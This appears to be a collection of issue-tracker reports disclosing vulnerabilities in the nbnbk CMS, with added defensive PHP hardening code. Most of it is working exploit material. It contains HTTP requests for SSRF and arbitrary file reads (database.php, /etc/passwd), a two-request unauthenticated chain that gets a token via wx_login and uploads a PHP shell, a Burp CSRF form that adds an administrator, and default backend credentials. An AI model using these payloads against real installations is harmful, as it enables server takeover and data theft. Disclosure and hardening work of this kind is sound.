nbnbk's Issues

🛡️ SSRF vulnerability in nbnbk

0x00 Preface

This vulnerability allows requests to be sent in the guise of the server, but there is no echo of the response, so the impact is small; it could be used for DDoS.

Affected version: default

0x01 Vulnerability Reproduction

POST /api/Image/curl_upload_image HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

url=http://127.0.0.1:8088&file[tmp_name]=1&file[type]=1&file[name]=1

Replace url to carry out the SSRF attack; the vulnerability has no echo. After sending the request you can see that the server has made an outgoing request.

🛡️ Nbnbk has an arbitrary file read vulnerability

POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

url=../application/database.php

Read a file by modifying the url parameter, then look at the returned data.

HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8


The file contents are in the data field, base64-encoded, but the string contains many \r\n sequences, so it cannot be decoded directly. We can strip all the \r\n with JavaScript.

  1. Open the Google Chrome browser
  2. Open a console
  3. Enter the following code

const a = "$data string";                  // paste the value of the data field as a JS string literal
const cleaned = a.replaceAll('\r\n', '');  // the literal's \r\n escapes become CR LF, which this removes
cleaned

Demonstration of converting the data with the code above

Base64-decode the converted data; I used the Google Chrome extension FeHelper.

🛡️ nbnbk has an arbitrary file upload (Getshell)

0x00 Preface

This vulnerability allows arbitrary file upload and Getshell without any account or password; two requests are enough to gain control of the machine directly.

Affected version: default

0x01 Vulnerability Reproduction

1. Get a token

The file upload interface requires an access_token, which we can obtain through the following interface:

POST /api/login/wx_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

openid=1&unionid=1&sex=1&head_img=1&nickname=1

In the response you can see that the token has been generated:

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2022 01:37:25 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 831
Connection: close
Content-Type: text/html; charset=UTF-8

{"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}

2. Start an HTTP server on the VPS

echo '<?php phpinfo();' > index.php
python -m http.server 8099

3. Upload the file

POST /api/User/download_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close

access_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php

Here access_token is the token obtained above, url is the file address and path is the file name.

A 200 response means success. Visiting http://nbnbk:8888/info.php directly shows that the file has been written and is parsed successfully.

0x02 Vulnerability Analysis

1. Finding the dangerous function

Searching globally for fopen, the file-opening function, we found a place under api where the path is controlled by a variable, which very likely has a problem.

Double-clicking through shows it is the download_img function, in which the url and path variables are controllable.

Here curl is used directly to fetch the url we supply, and path is not filtered at all; the file is read and written straight to the specified directory.

Constructing the request directly gives a token error, so next we need to obtain a token.

2. Getting a token

From the source we can see that you must be logged in to call getToken. A token could be obtained by registering and logging in, but if registration is disabled or broken we cannot get one that way. Is there a way to get a token without an account and password?

Looking further at the login functionality in Login.php, we find a way to log in without an account or password.

Following the wxLogin function further:

  1. The collapsed function contains validation of the input; roughly, if the user does not exist a new one is created, which we can ignore here.
  2. After validation passes, a new token is generated.

We construct the packet directly, fill in the required fields, and get the generated token. That concludes the analysis.
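As an added defensive example (not nbnbk's own code): one way the path parameter of download_img could be constrained so that a fetched file can never be stored as executable PHP. The upload directory, the allowed extensions and the function names are assumptions.

```php
<?php
// Added example, not nbnbk's code: constraining the user-supplied `path` of a download_img-style
// endpoint. The directory, extension list and function names are assumptions.

/** Map a requested file name to a safe destination inside $uploadDir; only the extension is consulted. */
function safeUploadTarget(string $requestedName, string $uploadDir): string
{
    $allowedExt = ['jpg', 'jpeg', 'png', 'gif', 'webp'];           // image-only endpoint, no .php/.phtml/...
    $base = basename($requestedName);                               // strips "../" and absolute prefixes
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));       // last extension only: info.php.png -> png
    if (!in_array($ext, $allowedExt, true)) {
        throw new InvalidArgumentException("extension '$ext' is not allowed");
    }
    $dir = realpath($uploadDir);                                    // must exist; keep it outside the web root
    if ($dir === false || !is_dir($dir)) {
        throw new RuntimeException('upload directory is missing');
    }
    // The caller's stem is discarded: a random name cannot collide with or overwrite anything
    return $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Reject bytes that do not decode as an image, whatever the URL or name claimed. */
function assertImageBytes(string $bytes): array
{
    $info = @getimagesizefromstring($bytes);
    if ($info === false) {
        throw new InvalidArgumentException('downloaded content is not an image');
    }
    // Header sniffing alone is weak (a GIF header followed by PHP still passes); the extension
    // allowlist and a directory where PHP is not executed are the controls that matter.
    return $info;                                                  // [width, height, IMAGETYPE_*, ...]
}

// Demonstration on constructed inputs: the report's path=info.php is rejected, a traversal
// attempt collapses to its basename and gets a random name, and a PHP body is refused.
$dir = sys_get_temp_dir();
try {
    safeUploadTarget('info.php', $dir);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
echo safeUploadTarget('../../uploads/avatar.png', $dir), "\n";
try {
    assertImageBytes('<?php phpinfo();');                          // the body served by the report's index.php
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```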

[Vuln] SSRF vulnerability in getFileBinary Function

A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

    /**
     * Convert a file to a base64 binary stream
     * @param $url network file path, absolute address
     * @return string
     */
    public function getFileBinary()
    {
        // No scheme or host restriction: file://, http://127.0.0.1 and similar all reach file_get_contents
        $str = file_get_contents($_REQUEST['url']);
        Util::echo_json(ReturnData::create(ReturnData::SUCCESS, chunk_split(base64_encode($str))));
    }

Vulnerability PoC

GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

A remote attacker can also read arbitrary file information from the target system.

PoC

GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close

After decoding the data field of the HTTP response body from base64, you can get the specific content of the file (/etc/passwd).
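As an added defensive example (not nbnbk's own code): a restricted fetch that could replace the file_get_contents($_REQUEST['url']) call in getFileBinary above, and equally the curl fetch in download_img. It allows only http/https, refuses hosts that resolve to loopback, private or link-local addresses, pins the checked address for the actual request and disables redirects. The function names, size cap and timeout are assumptions.

```php
<?php
// Added example, not nbnbk's code: a restricted fetch to use in place of file_get_contents($_REQUEST['url']).
/** Validate scheme and host; return [host, port, ip] for a public http(s) URL, throw otherwise. */
function checkPublicHttpUrl(string $url): array
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        throw new InvalidArgumentException('malformed url');
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {          // rules out file://, php://, gopher:// ...
        throw new InvalidArgumentException('only http/https are allowed');
    }
    // IPv4 literals are used as-is; hostnames are resolved now so the same address can be pinned below.
    // IPv6 literals and hosts without an A record fail closed (gethostbynamel is IPv4-only).
    $host = $p['host'];
    $ips = filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? [$host] : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        throw new InvalidArgumentException('host does not resolve to an IPv4 address');
    }
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16; NO_RES_RANGE: 0/8, 127/8, 169.254/16, 240/4
        if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
            throw new InvalidArgumentException("host resolves to non-public address $ip");
        }
    }
    return [$host, $p['port'] ?? ($scheme === 'https' ? 443 : 80), $ips[0]];
}

/** Fetch with the validated address pinned, redirects disabled and a size cap. */
function fetchPublicUrl(string $url, int $maxBytes = 5 * 1024 * 1024): string
{
    [$host, $port, $ip] = checkPublicHttpUrl($url);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                 // a 302 to 127.0.0.1 or file:// must not be followed
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["$host:$port:$ip"],   // reuse the checked address: no DNS-rebinding window
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => $maxBytes,
    ]);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    if ($body === false || $code !== 200) {
        throw new RuntimeException("fetch failed (HTTP $code)");
    }
    return $body;
}
```

An endpoint that only needs images (as download_img does) should additionally require the fetched bytes to decode as an image before storing them.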

🛡️ CSRF to add a backend user in nbnbk

Through CSRF, this vulnerability allows an administrator account to be added without leaving a trace and without knowing the administrator's account and password to enter the backend.

Affected version: default

Specific implementation

http://nbnbk:8888/fladmin/login

Open the /fladmin/login path to reach the backend login page.

Use the default password admin888/123456 to enter the backend, then find the "Add administrator" function on the "Administrator" page in the user management list.

Enter any username and password and click Save.

View the request packet in Burp (bp), then generate the CSRF PoC code with Burp.

After copying it, create a new file locally and start a local web server with python -m http.server 8099.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://nbnbk:8888/fladmin/admin/add" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="pwd" value="123456" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Click Submit request to submit the request.

After clicking, a message indicates the addition succeeded.

Look at our request packet:

Origin and Referer are our own server. That concludes the CSRF add-administrator report.
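As an added defensive example (not nbnbk's own code): the Origin/Referer mismatch observed above, turned into a server-side check for state-changing backend routes such as /fladmin/admin/add. The allowed-origin list and function names are assumptions.

```php
<?php
// Added example, not nbnbk's code: an Origin/Referer check for state-changing backend routes
// such as /fladmin/admin/add. The allowed origin list and function names are assumptions.

/** True only when the request provably originates from one of our own origins. */
function csrfOriginOk(array $headers, array $allowedOrigins): bool
{
    $h = array_change_key_case($headers, CASE_LOWER);
    $origin = $h['origin'] ?? null;
    if ($origin === null || $origin === 'null') {
        // No usable Origin: fall back to the origin part of the Referer
        $p = parse_url($h['referer'] ?? '');
        if ($p === false || empty($p['scheme']) || empty($p['host'])) {
            return false;                                  // fail closed: nothing tells us where this came from
        }
        $origin = $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '');
    }
    $allowed = array_map('strtolower', $allowedOrigins);
    return in_array(strtolower(rtrim($origin, '/')), $allowed, true);
}

/** Decide as a request filter for /fladmin/admin/add would, given the backend's own origin. */
function classifyAdminRequest(array $headers): string
{
    $ownOrigins = ['http://nbnbk:8888'];                   // the panel's origin from the report (assumed complete)
    return csrfOriginOk($headers, $ownOrigins) ? 'accept' : 'reject: cross-site request';
}

// Constructed headers: a Save from the admin panel itself, then the Burp PoC page served by
// python -m http.server 8099 as in the report, with and without an Origin header.
echo classifyAdminRequest(['Origin' => 'http://nbnbk:8888', 'Referer' => 'http://nbnbk:8888/fladmin/admin/add']), "\n";
echo classifyAdminRequest(['Origin' => 'http://127.0.0.1:8099', 'Referer' => 'http://127.0.0.1:8099/csrf.html']), "\n";
echo classifyAdminRequest(['Referer' => 'http://127.0.0.1:8099/csrf.html']), "\n";
```

This complements, and does not replace, a per-session anti-CSRF token on the admin form and a SameSite attribute on the backend session cookie.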
